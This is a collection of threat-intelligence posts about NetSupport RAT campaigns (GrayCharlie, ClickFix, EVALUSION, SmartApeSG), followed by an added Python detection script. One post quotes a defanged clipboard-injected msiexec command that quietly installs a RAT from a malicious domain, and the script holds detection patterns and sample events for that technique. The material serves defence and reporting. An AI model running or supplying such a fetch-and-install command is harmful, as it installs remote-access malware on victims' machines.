GrayCharlie Hijacks WordPress to Deploy NetSupport RAT

GrayCharlie is a threat actor compromising WordPress sites to deliver
NetSupport RAT.

Pulse ID: 699e1a3549ab2f017a665928
Pulse Link: https://otx.alienvault.com/pulse/699e1a3549ab2f017a665928
Pulse Author: cryptocti
Created: 2026-02-24 21:37:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RDP #Word #Wordpress #bot #cryptocti

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Law Firm Sites Hijacked in Suspected Supply-Chain Attack

GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites to inject links redirecting visitors to NetSupport RAT payloads via fake browser updates or ClickFix mechanisms. These infections often lead to Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one involving fake browser updates and another using ClickFix-style lures. The group's objectives appear to focus on data theft and financial gain, with potential access selling to other threat actors.

Pulse ID: 6995e8969f9d1c390db3fa4e
Pulse Link: https://otx.alienvault.com/pulse/6995e8969f9d1c390db3fa4e
Pulse Author: AlienVault
Created: 2026-02-18 16:28:06

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #DataTheft #FakeBrowser #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RDP #SMS #Stealc #Word #Wordpress #bot #AlienVault


2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/

#JSsmuggler #Malware #Cybersecurity #Windows

New JS#SMUGGLER Campaign Drops NetSupport RAT Through Infected Sites


Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

New EVALUSION ClickFix campaign:
Amatera Stealer and NetSupport RAT are being distributed

Cyber security researchers at eSentire have discovered a malware campaign named EVALUSION that uses the now widespread ClickFix social engineering pattern to install the Amatera Stealer and the NetSupport RAT.

More: https://maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

New EVALUSION ClickFix campaign – maniabel.work

Discover what you can do yourself for the security and protection of your data.

EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT

Learn more about the EVALUSION campaign delivering the Amatera infostealer malware and NetSupport RAT, and get security recommendations from eSentire’s…

eSentire

SmartApeSG campaign uses ClickFix page to push NetSupport RAT
#SmartApeSG #NetSupportRAT
https://isc.sans.edu/diary/32474

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a
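
An added detection example, not part of any of the posts above: it flags process-creation events that match the clipboard-injected msiexec command in the SmartApeSG post (quiet install straight from a URL) and the Run-dialog, mshta.exe, PowerShell sequence described in the EVALUSION post. The event tuple layout, the rule names and every sample event are assumptions constructed for illustration.

```python
import re

# msiexec installing (/i or /package) directly from an http(s) URL ...
REMOTE_MSI = re.compile(r'(?i)\bmsiexec(?:\.exe)?"?\s.*?[/-](?:i|package)\s+"?https?://')
# ... with the installer UI suppressed (/q, /qn or /quiet).
QUIET = re.compile(r'(?i)(?:^|\s)[/-](?:qn|quiet|q)\b')
HAS_URL = re.compile(r'(?i)https?://')
RUN_DIALOG_TARGETS = ("mshta.exe", "msiexec.exe", "powershell.exe")

def refang(text):
    """Undo report-style defanging (hxxp, [:], [.]) so a quoted command can be tested."""
    return text.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")

def classify(parent, image, cmdline):
    """Return the names of the (hypothetical) rules one process-creation event matches."""
    parent, image = parent.lower(), image.lower()
    hits = []
    if REMOTE_MSI.search(cmdline) and QUIET.search(cmdline):
        hits.append("msiexec_remote_quiet_install")
    # A command pasted into the Run dialog starts as a child of explorer.exe.
    if (parent.endswith("explorer.exe") and image.endswith(RUN_DIALOG_TARGETS)
            and HAS_URL.search(cmdline)):
        hits.append("run_dialog_lolbin_with_url")
    if parent.endswith("mshta.exe") and image.endswith("powershell.exe"):
        hits.append("mshta_spawns_powershell")
    return hits

# Constructed process-creation events: (parent image, image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
     refang("msiexec /i hxxps[:]//msi.example[.]invalid/res/pkg OPT=setup.bat /qn")),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
     "mshta https://cdn.example.invalid/verify"),
    (r"C:\Windows\System32\mshta.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command <constructed>"),
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Installers\app.msi /qn"),  # local quiet install: no hit
]

def scan(events):
    """Keep only the events that matched at least one rule."""
    return [(e, hits) for e in events if (hits := classify(*e))]

if __name__ == "__main__":
    for (parent, image, cmdline), hits in scan(SAMPLE_EVENTS):
        print(hits, "|", cmdline)
```

The local quiet install in the last sample event is deliberately left unflagged, since silent MSI installs from disk are routine for software deployment tooling.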